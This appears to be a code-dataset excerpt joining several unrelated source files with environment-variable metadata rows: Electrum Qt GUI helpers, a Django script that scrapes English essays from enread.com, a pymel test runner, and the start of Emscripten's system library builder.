hbox = QHBoxLayout()
buttons = self.get_toolbar_buttons()
for b in buttons:
b.setVisible(False)
hbox.addWidget(b)
hide_button = QPushButton('x')
hide_button.setVisible(False)
hide_button.pressed.connect(lambda: self.show_toolbar(False, config))
self.toolbar_buttons = buttons + (hide_button,)
hbox.addStretch()
hbox.addWidget(hide_button)
return hbox
def save_toolbar_state(self, state, config):
pass # implemented in subclasses
def show_toolbar(self, state, config=None):
if state == self.toolbar_shown:
return
self.toolbar_shown = state
if config:
self.save_toolbar_state(state, config)
for b in self.toolbar_buttons:
b.setVisible(state)
if not state:
self.on_hide_toolbar()
def toggle_toolbar(self, config=None):
self.show_toolbar(not self.toolbar_shown, config)
def add_copy_menu(self, menu: QMenu, idx) -> QMenu:
cc = menu.addMenu(_("Copy"))
for column in self.Columns:
column_title = self.original_model().horizontalHeaderItem(column).text()
if not column_title:
continue
item_col = self.item_from_index(idx.sibling(idx.row(), column))
clipboard_data = item_col.data(self.ROLE_CLIPBOARD_DATA)
if clipboard_data is None:
clipboard_data = item_col.text().strip()
cc.addAction(column_title,
lambda text=clipboard_data, title=column_title:
self.place_text_on_clipboard(text, title=title))
return cc
def place_text_on_clipboard(self, text: str, *, title: str = None) -> None:
self.parent.do_copy(text, title=title)
def showEvent(self, e: 'QShowEvent'):
super().showEvent(e)
if e.isAccepted() and self._pending_update:
self._forced_update = True
self.update()
self._forced_update = False
def maybe_defer_update(self) -> bool:
"""Returns whether we should defer an update/refresh."""
defer = (not self._forced_update
and (not self.isVisible() or self.is_editor_open))
# side-effect: if we decide to defer update, the state will become stale:
self._pending_update = defer
return defer
class MySortModel(QSortFilterProxyModel):
def __init__(self, parent, *, sort_role):
super().__init__(parent)
self._sort_role = sort_role
def lessThan(self, source_left: QModelIndex, source_right: QModelIndex):
item1 = self.sourceModel().itemFromIndex(source_left)
item2 = self.sourceModel().itemFromIndex(source_right)
data1 = item1.data(self._sort_role)
data2 = item2.data(self._sort_role)
if data1 is not None and data2 is not None:
return data1 < data2
v1 = item1.text()
v2 = item2.text()
try:
return Decimal(v1) < Decimal(v2)
except:
return v1 < v2
class ButtonsWidget(QWidget):
def __init__(self):
super(QWidget, self).__init__()
self.buttons = [] # type: List[QToolButton]
def resizeButtons(self):
frameWidth = self.style().pixelMetric(QStyle.PM_DefaultFrameWidth)
x = self.rect().right() - frameWidth - 10
y = self.rect().bottom() - frameWidth
for button in self.buttons:
sz = button.sizeHint()
x -= sz.width()
button.move(x, y - sz.height())
def addButton(self, icon_name, on_click, tooltip):
button = QToolButton(self)
button.setIcon(read_QIcon(icon_name))
button.setIconSize(QSize(25,25))
button.setCursor(QCursor(Qt.PointingHandCursor))
button.setStyleSheet("QToolButton { border: none; hover {border: 1px} pressed {border: 1px} padding: 0px; }")
button.setVisible(True)
button.setToolTip(tooltip)
button.clicked.connect(on_click)
self.buttons.append(button)
return button
def addCopyButton(self, app):
self.app = app
self.addButton("copy.png", self.on_copy, _("Copy to clipboard"))
def on_copy(self):
self.app.clipboard().setText(self.text())
QToolTip.showText(QCursor.pos(), _("Text copied to clipboard"), self)
def addPasteButton(self, app):
self.app = app
self.addButton("copy.png", self.on_paste, _("Paste from clipboard"))
def on_paste(self):
self.setText(self.app.clipboard().text())
class ButtonsLineEdit(QLineEdit, ButtonsWidget):
def __init__(self, text=None):
QLineEdit.__init__(self, text)
self.buttons = []
def resizeEvent(self, e):
o = QLineEdit.resizeEvent(self, e)
self.resizeButtons()
return o
class ButtonsTextEdit(QPlainTextEdit, ButtonsWidget):
def __init__(self, text=None):
QPlainTextEdit.__init__(self, text)
self.setText = self.setPlainText
self.text = self.toPlainText
self.buttons = []
def resizeEvent(self, e):
o = QPlainTextEdit.resizeEvent(self, e)
self.resizeButtons()
return o
class PasswordLineEdit(QLineEdit):
def __init__(self, *args, **kwargs):
QLineEdit.__init__(self, *args, **kwargs)
self.setEchoMode(QLineEdit.Password)
def clear(self):
# Try to actually overwrite the memory.
# This is really just a best-effort thing...
self.setText(len(self.text()) * " ")
super().clear()
class TaskThread(QThread):
'''Thread that runs background tasks. Callbacks are guaranteed
to happen in the context of its parent.'''
class Task(NamedTuple):
task: Callable
cb_success: Optional[Callable]
cb_done: Optional[Callable]
cb_error: Optional[Callable]
doneSig = pyqtSignal(object, object, object)
def __init__(self, parent, on_error=None):
super(TaskThread, self).__init__(parent)
self.on_error = on_error
self.tasks = queue.Queue()
self.doneSig.connect(self.on_done)
self.start()
def add(self, task, on_success=None, on_done=None, on_error=None):
on_error = on_error or self.on_error
self.tasks.put(TaskThread.Task(task, on_success, on_done, on_error))
def run(self):
while True:
task = self.tasks.get() # type: TaskThread.Task
if not task:
break
try:
result = task.task()
self.doneSig.emit(result, task.cb_done, task.cb_success)
except BaseException:
self.doneSig.emit(sys.exc_info(), task.cb_done, task.cb_error)
def on_done(self, result, cb_done, cb_result):
# This runs in the parent's thread.
if cb_done:
cb_done()
if cb_result:
cb_result(result)
def stop(self):
self.tasks.put(None)
self.exit()
self.wait()
class ColorSchemeItem:
def __init__(self, fg_color, bg_color):
self.colors = (fg_color, bg_color)
def _get_color(self, background):
return self.colors[(int(background) + int(ColorScheme.dark_scheme)) % 2]
def as_stylesheet(self, background=False):
css_prefix = "background-" if background else ""
color = self._get_color(background)
return "QWidget {{ {}color:{}; }}".format(css_prefix, color)
def as_color(self, background=False):
color = self._get_color(background)
return QColor(color)
class ColorScheme:
dark_scheme = False
GREEN = ColorSchemeItem("#117c11", "#8af296")
YELLOW = ColorSchemeItem("#897b2a", "#ffff00")
RED = ColorSchemeItem("#7c1111", "#f18c8c")
BLUE = ColorSchemeItem("#123b7c", "#8cb3f2")
DEFAULT = ColorSchemeItem("black", "white")
GRAY = ColorSchemeItem("gray", "gray")
@staticmethod
def has_dark_background(widget):
brightness = sum(widget.palette().color(QPalette.Background).getRgb()[0:3])
return brightness < (255*3/2)
@staticmethod
def update_from_widget(widget, force_dark=False):
if force_dark or ColorScheme.has_dark_background(widget):
ColorScheme.dark_scheme = True
class AcceptFileDragDrop:
def __init__(self, file_type=""):
assert isinstance(self, QWidget)
self.setAcceptDrops(True)
self.file_type = file_type
def validateEvent(self, event):
if not event.mimeData().hasUrls():
event.ignore()
return False
for url in event.mimeData().urls():
if not url.toLocalFile().endswith(self.file_type):
event.ignore()
return False
event.accept()
return True
def dragEnterEvent(self, event):
self.validateEvent(event)
def dragMoveEvent(self, event):
if self.validateEvent(event):
event.setDropAction(Qt.CopyAction)
def dropEvent(self, event):
if self.validateEvent(event):
for url in event.mimeData().urls():
self.onFileAdded(url.toLocalFile())
def onFileAdded(self, fn):
raise NotImplementedError()
def import_meta_gui(electrum_window: 'ElectrumWindow', title, importer, on_success):
filter_ = "JSON (*.json);;All files (*)"
filename = getOpenFileName(
parent=electrum_window,
title=_("Open {} file").format(title),
filter=filter_,
config=electrum_window.config,
)
if not filename:
return
try:
importer(filename)
except FileImportFailed as e:
electrum_window.show_critical(str(e))
else:
electrum_window.show_message(_("Your {} were successfully imported").format(title))
on_success()
def export_meta_gui(electrum_window: 'ElectrumWindow', title, exporter):
filter_ = "JSON (*.json);;All files (*)"
filename = getSaveFileName(
parent=electrum_window,
title=_("Select file to save your {}").format(title),
filename='electrum_{}.json'.format(title),
filter=filter_,
config=electrum_window.config,
)
if not filename:
return
try:
exporter(filename)
except FileExportFailed as e:
electrum_window.show_critical(str(e))
else:
electrum_window.show_message(_("Your {0} were exported to '{1}'")
.format(title, str(filename)))
def getOpenFileName(*, parent, title, filter="", config: 'SimpleConfig') -> Optional[str]:
"""Custom wrapper for getOpenFileName that remembers the path selected by the user."""
directory = config.get('io_dir', os.path.expanduser('~'))
fileName, __ = QFileDialog.getOpenFileName(parent, title, directory, filter)
if fileName and directory != os.path.dirname(fileName):
config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def getSaveFileName(
*,
parent,
title,
filename,
filter="",
default_extension: str = None,
default_filter: str = None,
config: 'SimpleConfig',
) -> Optional[str]:
"""Custom wrapper for getSaveFileName that remembers the path selected by the user."""
directory = config.get('io_dir', os.path.expanduser('~'))
path = os.path.join(directory, filename)
file_dialog = QFileDialog(parent, title, path, filter)
file_dialog.setAcceptMode(QFileDialog.AcceptSave)
if default_extension:
# note: on MacOS, the selected filter's first extension seems to have priority over this...
file_dialog.setDefaultSuffix(default_extension)
if default_filter:
assert default_filter in filter, f"default_filter={default_filter!r} does not appear in filter={filter!r}"
file_dialog.selectNameFilter(default_filter)
if file_dialog.exec() != QDialog.Accepted:
return None
selected_path = file_dialog.selectedFiles()[0]
if selected_path and directory != os.path.dirname(selected_path):
config.set_key('io_dir', os.path.dirname(selected_path), True)
return selected_path
def icon_path(icon_basename):
return resource_path('gui', 'icons', icon_basename)
@lru_cache(maxsize=1000)
def read_QIcon(icon_basename):
return QIcon(icon_path(icon_basename))
class IconLabel(QWidget):
IconSize = QSize(16, 16)
HorizontalSpacing = 2
def __init__(self, *, text='', final_stretch=True):
super(QWidget, self).__init__()
layout = QHBoxLayout()
layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(layout)
self.icon = QLabel()
self.label = QLabel(text)
self.label.setTextInteractionFlags(Qt.TextSelectableByMouse)
layout.addWidget(self.label)
layout.addSpacing(self.HorizontalSpacing)
layout.addWidget(self.icon)
if final_stretch:
layout.addStretch()
def setText(self, text):
self.label.setText(text)
def setIcon(self, icon):
self.icon.setPixmap(icon.pixmap(self.IconSize))
self.icon.repaint() # macOS hack for #6269
def get_default_language():
name = QLocale.system().name()
return name if name in languages else 'en_UK'
def char_width_in_lineedit() -> int:
char_width = QFontMetrics(QLineEdit().font()).averageCharWidth()
# 'averageCharWidth' seems to underestimate on Windows, hence 'max()'
return max(9, char_width)
def webopen(url: str):
if sys.platform == 'linux' and os.environ.get('APPIMAGE'):
# When on Linux webbrowser.open can fail in AppImage because it can't find the correct libdbus.
# We just fork the process and unset LD_LIBRARY_PATH before opening the URL.
# See #5425
if os.fork() == 0:
del os.environ['LD_LIBRARY_PATH']
webbrowser.open(url)
os._exit(0)
else:
webbrowser.open(url)
class FixedAspectRatioLayout(QLayout):
def __init__(self, parent: QWidget = None, aspect_ratio: float = 1.0):
super().__init__(parent)
self.aspect_ratio = aspect_ratio
self.items: List[QLayoutItem] = []
def set_aspect_ratio(self, aspect_ratio: float = 1.0):
self.aspect_ratio = aspect_ratio
self.update()
def addItem(self, item: QLayoutItem):
self.items.append(item)
def count(self) -> int:
return len(self.items)
def itemAt(self, index: int) -> QLayoutItem:
if index >= len(self.items):
return None
return self.items[index]
def takeAt(self, index: int) -> QLayoutItem:
if index >= len(self.items):
return None
return self.items.pop(index)
def _get_contents_margins_size(self) -> QSize:
margins = self.contentsMargins()
return QSize(margins.left() + margins.right(), margins.top() + margins.bottom())
def setGeometry(self, rect: QRect):
super().setGeometry(rect)
if not self.items:
return
contents = self.contentsRect()
if contents.height() > 0:
c_aratio = contents.width() / contents.height()
else:
c_aratio = 1
s_aratio = self.aspect_ratio
item_rect = QRect(QPoint(0, 0), QSize(
contents.width() if c_aratio < s_aratio else contents.height() * s_aratio,
contents.height() if c_aratio > s_aratio else contents.width() / s_aratio
))
content_margins = self.contentsMargins()
free_space = contents.size() - item_rect.size()
for item in self.items:
if free_space.width() > 0 and not item.alignment() & Qt.AlignLeft:
if item.alignment() & Qt.AlignRight:
item_rect.moveRight(contents.width() + content_margins.right())
else:
item_rect.moveLeft(content_margins.left() + (free_space.width() / 2))
else:
item_rect.moveLeft(content_margins.left())
if free_space.height() > 0 and not item.alignment() & Qt.AlignTop:
if item.alignment() & Qt.AlignBottom:
item_rect.moveBottom(contents.height() + content_margins.bottom())
else:
item_rect.moveTop(content_margins.top() + (free_space.height() / 2))
else:
item_rect.moveTop(content_margins.top())
item.widget().setGeometry(item_rect)
def sizeHint(self) -> QSize:
result = QSize()
for item in self.items:
result = result.expandedTo(item.sizeHint())
return self._get_contents_margins_size() + result
def minimumSize(self) -> QSize:
result = QSize()
for item in self.items:
result = result.expandedTo(item.minimumSize())
return self._get_contents_margins_size() + result
def expandingDirections(self) -> Qt.Orientations:
return Qt.Horizontal | Qt.Vertical
def QColorLerp(a: QColor, b: QColor, t: float):
"""
Blends two QColors. t=0 returns a. t=1 returns b. t=0.5 returns evenly mixed.
"""
t = max(min(t, 1.0), 0.0)
i_t = 1.0 - t
return QColor(
(a.red() * i_t) + (b.red() * t),
(a.green() * i_t) + (b.green() * t),
(a.blue() * i_t) + (b.blue() * t),
(a.alpha() * i_t) + (b.alpha() * t),
)
class ImageGraphicsEffect(QObject):
"""
Applies a QGraphicsEffect to a QImage
"""
def __init__(self, parent: QObject, effect: QGraphicsEffect):
super().__init__(parent)
assert effect, 'effect must be set'
self.effect = effect
self.graphics_scene = QGraphicsScene()
self.graphics_item = QGraphicsPixmapItem()
self.graphics_item.setGraphicsEffect(effect)
self.graphics_scene.addItem(self.graphics_item)
def apply(self, image: QImage):
assert image, 'image must be set'
result = QImage(image.size(), QImage.Format_ARGB32)
result.fill(Qt.transparent)
painter = QPainter(result)
self.graphics_item.setPixmap(QPixmap.fromImage(image))
self.graphics_scene.render(painter)
self.graphics_item.setPixmap(QPixmap())
return result
if __name__ == "__main__":
app = QApplication([])
t = WaitingDialog(None, 'testing ...', lambda: [time.sleep(1)], lambda x: QMessageBox.information(None, 'done', "done"))
t.start()
app.exec_()
|
[] |
[] |
[
"APPIMAGE",
"LD_LIBRARY_PATH"
] |
[]
|
["APPIMAGE", "LD_LIBRARY_PATH"]
|
python
| 2 | 0 | |
db_tools/gen_readings.py
|
"""爬取网络上的英文文章,保存到数据库"""
import sys
import os
import requests
import re
from bs4 import BeautifulSoup
import time
import random
from db_tools.gen_reading_ids import FILE_STORAGE
# 将当前文件所在目录设置到django环境下
pwd = os.path.dirname(os.path.realpath(__file__))
sys.path.append(pwd + "../")
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "CET6Cat.settings")
# 初始化django环境
import django
django.setup()
# 导入django内部的model必须在初始化django之后,不能放在最上边
from readings.models import Reading
"""
www.enread.com
目标:爬取该网站上的英文文章
"""
# 请求头和代理池,请求不到了就更新一下Cookie和Referer和代理
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36',
'Cookie': 'yunsuo_session_verify=47caaea7006b66b3027c74b4aff09465; security_session_mid_verify=0fb499be8d029a761e051487fdd708f1; bdshare_firstime=1555141583186; Hm_lvt_8e0a0ac35ad5727d6e32afe2a02616e9=1555125825,1555139354,1555159765; __51cke__=; Hm_lpvt_8e0a0ac35ad5727d6e32afe2a02616e9=1555159775; __tins__1636281=%7B%22sid%22%3A%201555159765267%2C%20%22vd%22%3A%203%2C%20%22expires%22%3A%201555161574622%7D; __51laig__=3',
'Referer': 'http://www.enread.com/essays/index.html',
# 'Upgrade-Insecure-Requests': '1',
# 'Connection': 'keep - alive'
}
proxies = {
# 'http': 'http://110.52.235.61:9999',
'https:': 'https://219.138.47.221:9999'
}
def strip(s):
return s.strip()
# 读取要爬取的eid
with open(FILE_STORAGE, 'r') as f:
eids = map(strip, f.readlines())
# 用于记录爬取失败的index
fail = []
for index, eid in enumerate(eids):
if index <= 34: # 记录上次爬到哪一篇
continue
url = "http://www.enread.com/essays/" + eid + ".html"
article = head = None
max_cnt = 4 # 一个页面的最大尝试次数
# 网站做了保护,请求为空就再请求几次试试
while (not head or not article) and max_cnt > 0:
response = requests.get(url, headers=headers, proxies=proxies)
soup = BeautifulSoup(response.text, 'lxml')
head = soup.select(
'#wenzhangziti > table > tbody > tr:nth-of-type(1) > td > table > tbody > tr:nth-of-type(1) > td > div > font')
article = soup.select('#dede_content > div')
max_cnt -= 1
time.sleep(random.uniform(1.5, 2.5))
if (not head) or len(head) == 0:
print("{}=>{}获取失败".format(index, eid))
fail.append(index)
else:
# 处理标题
head = re.sub(r'</{0,1}\w.*?>', "", str(head[0]))
with open("../media/readings/" + eid, 'w', encoding='utf8') as f:
# 处理文章的逐段内容,并写入文件
for d in article:
# 匹配HTML标签并替换空串以将其删除
d = re.sub(r'(<a href="#_w_\d+">\d+</a>)|(</{0,1}\w.*?>)', "", str(d))
# 去除首尾空白(因为可能有大量空白)
d = d.strip()
if len(d) > 0:
f.write(d)
f.write("\n\n")
# 持久化到数据库
reading = Reading()
reading.name = head[:30]
reading.content = "readings/" + eid
reading.source_id = 4
reading.save()
print("[写入]{}=>{}".format(index, eid) + "=>" + head)
print(fail)
|
[] |
[] |
[] |
[]
|
[]
|
python
| 0 | 0 | |
tests/pymel_test.py
|
#!/usr/bin/env mayapy
#nosetests --with-doctest -v pymel --exclude '(windows)|(tools)|(arrays)|(example1)'
#import doctest
from __future__ import with_statement
import sys, platform, os, shutil, time, inspect, tempfile, doctest, re
# tee class adapted from http://shallowsky.com/blog/programming/python-tee.html
class Tee(object):
def __init__(self, _fd1, _fd2) :
self.fd1 = _fd1
self.fd2 = _fd2
def __del__(self) :
self.close()
def close(self):
for toClose in (self.fd1, self.fd2):
if toClose not in (sys.stdout, sys.stderr,
sys.__stdout__, sys.__stderr__, None):
toClose.close()
self.fd1 = self.fd2 = None
def write(self, text) :
self.fd1.write(text)
self.fd2.write(text)
def flush(self) :
self.fd1.flush()
self.fd2.flush()
#stderrsav = sys.stderr
#outputlog = open(logfilename, "w")
#sys.stderr = tee(stderrsav, outputlog)
try:
import nose
except ImportError, e:
print "To run pymel's tests you must have nose installed: http://code.google.com/p/python-nose"
raise e
# Get the 'new' version of unittest
if sys.version_info >= (2, 7, 0):
import unittest
else:
import unittest2 as unittest
import argparse
def getParser():
testsDir = os.path.dirname(os.path.abspath(sys.argv[0]))
pymelRoot = os.path.dirname( testsDir )
parser = argparse.ArgumentParser(description='Run the pymel tests')
parser.add_argument('extra_args', nargs='*', help='args to pass to nose or unit/unit2')
parser.add_argument('--app-dir', help='''make the tests use the given dir as
the MAYA_APP_DIR (ie, the base maya settings folder)''')
#parser.add_argument('--test', help='''specific TestCase or test function to
#run; if given, will be run using the "new" unittest"''')
parser.add_argument('--tests-dir', help='''The directory that contains the test modules''',
default=testsDir)
parser.add_argument('--pymel-root', help='''The directory that contains the test modules''',
default=pymelRoot)
return parser
_PYTHON_DOT_NAME_RE = re.compile(r'[A-Za-z_][A-Za-z_0-9]*(\.[A-Za-z_][A-Za-z_0-9]*)+')
def isPythonDottedName(name):
return bool(_PYTHON_DOT_NAME_RE.match(name))
def moduleObjNameSplit(moduleName):
'''Returns the name split into the module part and the object name part
'''
import imp
currentPath = None
split = moduleName.split('.')
moduleParts = []
for name in split:
try:
currentPath = [imp.find_module(name, currentPath)[1]]
except ImportError:
break
moduleParts.append(name)
return '.'.join(moduleParts), '.'.join(split[len(moduleParts):])
def nose_test(argv, module=None, pymelDir=None):
"""
Run pymel unittests / doctests
"""
arg0 = argv[0]
extraArgs = argv[1:]
if pymelDir:
os.chdir(pymelDir)
os.environ['MAYA_PSEUDOTRANS_MODE']='5'
os.environ['MAYA_PSEUDOTRANS_VALUE']=','
noseKwArgs={}
noseArgv = "dummyArg0 --with-doctest -vv".split()
if module is None:
#module = 'pymel' # if you don't set a module, nose will search the cwd
excludes = r'''^windows
\Wall\.py$
^tools
^example1
^testing
^eclipseDebug
^pmcmds
^testPa
^maya
^maintenance
^pymel_test
^TestPymel
^testPassContribution$'''.split()
# default inGui to false - if we are in gui, we should be able to query
# (definitively) that we are, but same may not be true from command line
inGui = False
try:
import maya.cmds
inGui = not maya.cmds.about(batch=1)
except Exception: pass
# if we're not in gui mode, disable the gui tests
if not inGui:
excludes.extend('^test_uitypes ^test_windows'.split())
noseArgv += ['--exclude', '|'.join( [ '(%s)' % x for x in excludes ] ) ]
if inspect.ismodule(module):
noseKwArgs['module']=module
elif module:
noseArgv.append(module)
if extraArgs is not None:
noseArgv.extend(extraArgs)
noseKwArgs['argv'] = noseArgv
with DocTestPatcher():
print "running nose:", noseKwArgs
nose.main( **noseKwArgs)
def unit2_test(argv, **kwargs):
# insert the verbose flag
argv[1:1] = ['--verbose']
kwargs['module'] = None
kwargs['argv'] = argv
if sys.version_info < (2, 7, 0):
# if we try to specify a specific method, unittest2 checks to see if it
# is an unbound method on a unittest2.TestCase; if it is on a
# unittest.TestCase, it will not work; therefore, install unittest2 as
# unittest
sys.modules['unittest'] = sys.modules['unittest2']
print "running unittest:", kwargs
unittest.main(**kwargs)
class DocTestPatcher(object):
"""
When finding docstrings from a module, DocTestFinder does a test to ensure that objects
in the namespace are actually from that module. Unfortunately, our LazyLoadModule causes
some problems with this. Eventually, we may experiment with setting the LazyLoadModule
and original module's dict's to be the same... for now, we use this class to override
DocTestFinder._from_module to return the results we want.
Also, the doctest will override the 'wantFile' setting for ANY .py file,
even it it matches the 'exclude' - it does this so that it can search all
python files for docs to add to the doctests.
Unfortunately, if some modules are simply loaded, they can affect things -
ie, if pymel.all is loaded, it will trigger the lazy-loading of all class
objects, which will make our lazy-loading tests fail.
To get around this, override the Doctest plugin object's wantFile to also
exclude the 'excludes'.
"""
def __enter__(self):
self.set_from_module()
self.set_wantFile()
def set_from_module(self):
self.orig_from_module = doctest.DocTestFinder.__dict__['_from_module']
def _from_module(docTestFinder_self, module, object):
"""
Return true if the given object is defined in the given
module.
"""
# We only have problems with functions...
if inspect.isfunction(object):
if 'LazyLoad' in module.__class__.__name__:
if module.__name__ == object.__module__:
return True
return self.orig_from_module(docTestFinder_self, module, object)
doctest.DocTestFinder._from_module = _from_module
def set_wantFile(self):
import nose
# if nose.__versioninfo__ > (1,0,0):
# self.orig_wantFile = None
# return
import nose.plugins.doctests
self.orig_wantFile = nose.plugins.doctests.Doctest.__dict__['wantFile']
def wantFile(self, file):
"""Override to select all modules and any file ending with
configured doctest extension.
"""
# Check if it's a desired file type
if ( (file.endswith('.py') or (self.extension
and anyp(file.endswith, self.extension)) )
# ...and that it isn't excluded
and (not self.conf.exclude
or not filter(None,
[exc.search(file)
for exc in self.conf.exclude]))):
return True
return None
nose.plugins.doctests.Doctest.wantFile = wantFile
def __exit__(self, *args, **kwargs):
doctest.DocTestFinder._from_module = self.orig_from_module
if self.orig_wantFile is not None:
import nose.plugins.doctests
nose.plugins.doctests.Doctest.wantFile = self.orig_wantFile
def main(argv):
parser = getParser()
parsed = parser.parse_args(argv[1:])
if parsed.app_dir:
if not os.path.exists(parsed.app_dir):
os.makedirs(parsed.app_dir)
os.environ['MAYA_APP_DIR'] = parsed.app_dir
testsDir = parsed.tests_dir
pymelRoot = parsed.pymel_root
pypath = os.environ.get('PYTHONPATH', '').split(os.pathsep)
# add the test dir to the python path - that way,
# we can do 'pymel_test test_general' in order to run just the tests
# in test_general
sys.path.append(testsDir)
pypath.append(testsDir)
# ...and add this copy of pymel to the python path, highest priority,
# to make sure it overrides any 'builtin' pymel/maya packages
sys.path.insert(0, pymelRoot)
pypath.insert(0, pymelRoot)
os.environ['PYTHONPATH'] = os.pathsep.join(pypath)
oldPath = os.getcwd()
# make sure our cwd is the pymel project working directory
os.chdir( pymelRoot )
try:
# Try to guess whether we were given an arg which is a TestCase or
# test method/function, and if so, run new unittest (because it can
# easily handle specific TestCase/method/function)... else run nose
# (because it's what the test suite was originally set up to use)
useNose = True
if parsed.extra_args:
name = parsed.extra_args[-1]
if isPythonDottedName(name):
modulePart, objPart = moduleObjNameSplit(name)
if modulePart and objPart:
useNose = False
argv = [argv[0]] + parsed.extra_args
if useNose:
nose_test(argv)
else:
unit2_test(argv)
finally:
os.chdir(oldPath)
if __name__ == '__main__':
main(sys.argv)
|
[] |
[] |
[
"MAYA_APP_DIR",
"MAYA_PSEUDOTRANS_VALUE",
"MAYA_PSEUDOTRANS_MODE",
"PYTHONPATH"
] |
[]
|
["MAYA_APP_DIR", "MAYA_PSEUDOTRANS_VALUE", "MAYA_PSEUDOTRANS_MODE", "PYTHONPATH"]
|
python
| 4 | 0 | |
tools/system_libs.py
|
# Copyright 2014 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
from __future__ import print_function
import glob
import hashlib
import itertools
import json
import logging
import os
import re
import shutil
import sys
import tarfile
import zipfile
from glob import iglob
from . import shared
from tools.shared import mangle_c_symbol_name, demangle_c_symbol_name
try:
from . import ports
# it's ok if the ports dir exists but is empty: then there are no ports
if not hasattr(ports, 'ports'):
ports.ports = []
except ImportError:
# it's ok if the ports dir doesn't exist: then there are no ports
class NoPorts:
ports = []
ports = NoPorts()
stdout = None
stderr = None
logger = logging.getLogger('system_libs')
LIBC_SOCKETS = ['socket.c', 'socketpair.c', 'shutdown.c', 'bind.c', 'connect.c',
'listen.c', 'accept.c', 'getsockname.c', 'getpeername.c', 'send.c',
'recv.c', 'sendto.c', 'recvfrom.c', 'sendmsg.c', 'recvmsg.c',
'getsockopt.c', 'setsockopt.c', 'freeaddrinfo.c']
def files_in_path(path_components, filenames):
srcdir = shared.path_from_root(*path_components)
return [os.path.join(srcdir, f) for f in filenames]
def glob_in_path(path_components, glob_pattern, excludes=()):
srcdir = shared.path_from_root(*path_components)
return [f for f in iglob(os.path.join(srcdir, glob_pattern)) if os.path.basename(f) not in excludes]
def get_all_files_under(dirname):
for path, subdirs, files in os.walk(dirname):
for name in files:
yield os.path.join(path, name)
def dir_is_newer(dir_a, dir_b):
assert os.path.exists(dir_a)
assert os.path.exists(dir_b)
newest_a = max([os.path.getmtime(x) for x in get_all_files_under(dir_a)])
newest_b = max([os.path.getmtime(x) for x in get_all_files_under(dir_b)])
return newest_a < newest_b
def get_cflags(force_object_files=False):
flags = []
if shared.Settings.WASM_BACKEND:
if shared.Settings.LTO and not force_object_files:
flags += ['-flto=' + shared.Settings.LTO]
if shared.Settings.RELOCATABLE:
flags += ['-s', 'RELOCATABLE']
return flags
def run_one_command(cmd):
# Helper function used by run_build_commands.
if shared.EM_BUILD_VERBOSE:
print(' '.join(cmd))
# building system libraries and ports should be hermetic in that it is not
# affected by things like EMMAKEN_CFLAGS which the user may have set
safe_env = os.environ.copy()
for opt in ['EMMAKEN_CFLAGS']:
if opt in safe_env:
del safe_env[opt]
shared.run_process(cmd, stdout=stdout, stderr=stderr, env=safe_env)
def run_build_commands(commands):
cores = min(len(commands), shared.Building.get_num_cores())
if cores <= 1:
for command in commands:
run_one_command(command)
else:
pool = shared.Building.get_multiprocessing_pool()
# https://stackoverflow.com/questions/1408356/keyboard-interrupts-with-pythons-multiprocessing-pool
# https://bugs.python.org/issue8296
# 999999 seconds (about 11 days) is reasonably huge to not trigger actual timeout
# and is smaller than the maximum timeout value 4294967.0 for Python 3 on Windows (threading.TIMEOUT_MAX)
pool.map_async(run_one_command, commands, chunksize=1).get(999999)
def static_library_ext():
return '.a' if shared.Settings.WASM_BACKEND else '.bc'
def create_lib(libname, inputs):
"""Create a library from a set of input objects."""
suffix = os.path.splitext(libname)[1]
if suffix in ('.bc', '.o'):
if len(inputs) == 1:
shutil.copyfile(inputs[0], libname)
else:
shared.Building.link_to_object(inputs, libname)
elif suffix == '.a':
shared.Building.emar('cr', libname, inputs)
else:
raise Exception('unknown suffix ' + libname)
def read_symbols(path):
with open(path) as f:
content = f.read()
# Require that Windows newlines should not be present in a symbols file, if running on Linux or macOS
# This kind of mismatch can occur if one copies a zip file of Emscripten cloned on Windows over to
# a Linux or macOS system. It will result in Emscripten linker getting confused on stray \r characters,
# and be unable to link any library symbols properly. We could harden against this by .strip()ping the
# opened files, but it is possible that the mismatching line endings can cause random problems elsewhere
# in the toolchain, hence abort execution if so.
if os.name != 'nt' and '\r\n' in content:
raise Exception('Windows newlines \\r\\n detected in symbols file "' + path + '"! This could happen for example when copying Emscripten checkout from Windows to Linux or macOS. Please use Unix line endings on checkouts of Emscripten on Linux and macOS!')
return shared.Building.parse_symbols(content).defs
def get_wasm_libc_rt_files():
# Static linking is tricky with LLVM, since e.g. memset might not be used
# from libc, but be used as an intrinsic, and codegen will generate a libc
# call from that intrinsic *after* static linking would have thought it is
# all in there. In asm.js this is not an issue as we do JS linking anyhow,
# and have asm.js-optimized versions of all the LLVM intrinsics. But for
# wasm, we need a better solution. For now, make another archive that gets
# included at the same time as compiler-rt.
# Note that this also includes things that may be depended on by those
# functions - fmin uses signbit, for example, so signbit must be here (so if
# fmin is added by codegen, it will have all it needs).
math_files = files_in_path(
path_components=['system', 'lib', 'libc', 'musl', 'src', 'math'],
filenames=[
'fmin.c', 'fminf.c', 'fminl.c',
'fmax.c', 'fmaxf.c', 'fmaxl.c',
'fmod.c', 'fmodf.c', 'fmodl.c',
'log2.c', 'log2f.c', 'log10.c', 'log10f.c',
'exp2.c', 'exp2f.c', 'exp10.c', 'exp10f.c',
'scalbn.c', '__fpclassifyl.c',
'__signbitl.c', '__signbitf.c', '__signbit.c'
])
other_files = files_in_path(
path_components=['system', 'lib', 'libc'],
filenames=['emscripten_memcpy.c', 'emscripten_memset.c',
'emscripten_memmove.c'])
# Calls to iprintf can be generated during codegen. Ideally we wouldn't
# compile these with -O2 like we do the rest of compiler-rt since its
# probably not performance sensitive. However we don't currently have
# a way to set per-file compiler flags. And hopefully we should be able
# move all this stuff back into libc once we it LTO compatible.
iprintf_files = files_in_path(
path_components=['system', 'lib', 'libc', 'musl', 'src', 'stdio'],
filenames=['__towrite.c', '__overflow.c', 'fwrite.c', 'fputs.c',
'printf.c', 'puts.c', '__lockfile.c'])
iprintf_files += files_in_path(
path_components=['system', 'lib', 'libc', 'musl', 'src', 'string'],
filenames=['strlen.c'])
return math_files + other_files + iprintf_files
class Library(object):
"""
`Library` is the base class of all system libraries.
There are two types of libraries: abstract and concrete.
